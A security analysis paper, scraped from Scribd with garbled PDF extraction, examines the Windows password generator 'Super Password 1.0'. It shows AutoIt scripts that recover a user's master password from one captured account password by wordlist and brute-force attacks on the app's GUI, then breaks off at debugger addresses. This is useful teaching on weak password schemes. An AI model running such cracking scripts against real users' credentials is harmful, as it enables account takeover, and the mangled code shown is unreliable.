Read without ads and support Scribd by becoming a Scribd Premium Reader.
See Premium Plans
 
Analysis of Super Password 1.0
Bart LeppensAnthony PironFebruary 2013
1 What is Super Password
Super Password is a MS Windows application, written in 2000 by Yan QiQi, last updated September2nd, 2010. The application lives as an icon in the system tray bar. It tries to fix the problem that weneed to remember different passwords for every account we create. It takes an account name and amaster password as an input and then, when the ”generate” button is pushed, some magic happens.A unique password of 12 characters is generated. Everytime you provide this master password incombination with an account name, the application can regenerate the same password again andagain.The helpfile of the application states: ”You needn’t worry about the security. The COA algorithmSuper Password uses to generate account passwords is very very complex and strong. No one canbreak it.” Let’s see if that’s true.
2 Blackbox Analysis
2.1 Blackbox characteristics
Super Password has some weird behavior and some strange characteristics. The resulting password isnot affected by:
providing the master password in uppercase or in lowercase.
providing the account name in uppercase or in lowercase.
adding special characters (like ´e,@, ¸c, ... ) to the master password.
adding special characters to the provided account....The range of allowed characters is thus limited to a-z0-9. The resulting password always exists of 12 characters which are limited by this same range: a-z0-9. Theoretically, the super password must1
 
consist of at least 4 characters and the account name must consist of at least 3 characters. Thislimitation only counts for the GUI, since if there are all special characters, this statement is wrongand there can even be no master password at all (e.g. @&
|
$). There doesn’t seem to be a limit tothe maximum length. But the more characters provided, the longer it seems to take to calculate thepassword.
2.2 Blackbox attacking
Suppose we have the credentials of one of the accounts (accountname and corresponding password).Then we can try to bruteforce the master password or we can use a wordlist and test if the masterpassword is on the list. One way of doing this is with a scripting language called AutoIt. The followingscripts are written for AutoIt v3.WinWaitActive(Super Password 1.0”);We search the master password which gives ”b3daeu6zlcl4”; for account name ”myaccount”$capturedpassword = ”b3daeu6zlcl4”$accountname = ”myaccount”ControlSetText (”Super Password 1.0” , ””,[CLASS: TEdit ; INSTANCE:3]” , ”myaccount”)Local $file = FileOpen(” wordlist . lst ,0)If $file =
1 ThenMsgBox(0 , Error , ”Unable to open f i l e ”)ExitEndIf While 1Local $line = FileReadLine ( $file )If @error =
1 Then ExitLoopControlSetText (”Super Password 1.0” , ””,[CLASS: TEdit ; INSTANCE:4]” , $line )ControlClick (”Super Password 1.0” , ””,[CLASS:TButton; INSTANCE:1])$a = ControlGetText( ”Super Password 1.0” , ””,[CLASS: TEdit ; INSTANCE:2])If $a == $capturedpassword ThenWhile (True)MsgBox(0 , ””, $line , 1)sleep (1000)WEndExitEndIf WEndThis way we were able to test +-4000 of passwords per minute on a AMD Turion 64 X2 Mobile1.8GHz system. When performing a brute force attack on the master password we can use thefollowing algorithm:WinWaitActive(Super Password 1.0”);We search the master password which gives ”5 xl2sdc0idf9; for account name ”myaccount”$capturedpassword = ”5 xl2sdc0idf92
 
$accountname = ”myaccount”ControlSetText (”Super Password 1.0” , ””,[CLASS: TEdit ; INSTANCE:3]” , $accountname)$String = ”a ,b, c ,d, e , f ,g ,h, i , j ,k , l ,m,n,o ,p,q, r , s , t ,u,v ,w,x,y, z”& ” ,0 ,1 ,2 ,3 ,4 ,5 ,6 ,7 ,8 ,9”$String = StringSplit ( $String , ,”)For $i = 1 To $String [0] Step +1For $i1 = 1 To $String [0] Step +1For $i2 = 1 To $String [0] Step +1For $i3 = 1 To $String [0] Step +1$1 = $String [ $i ] & $String [ $i1 ] & $String [ $i2 ] & $String [ $i3 ]ControlSetText (”Super Password 1.0” , ””,[CLASS: TEdit ; INSTANCE:4]” , $1)ControlClick (”Super Password 1.0” , ””,[CLASS:TButton; INSTANCE:1])$a = ControlGetText( ”Super Password 1.0” , ””,[CLASS: TEdit ; INSTANCE:2])If $a == $capturedpassword ThenWhile (True)MsgBox(0 , ””, $1 , 1)sleep (1000)WEndExitEndIf NextNextNextNextWith only 4000 keys a minute breaking a only 4 character password would take us almost 7 hours:(
36
4
4000
60
).
3 Whitebox Analysis
3.1 Modifying the original binary
When looking at the application with a debugger, we can see that there are some interesting addresses:
0x004022AA: calls the start of password generation which is located at 0x0040179C
0x00402474
0x0040264B: the applications help function3
Notes
Load more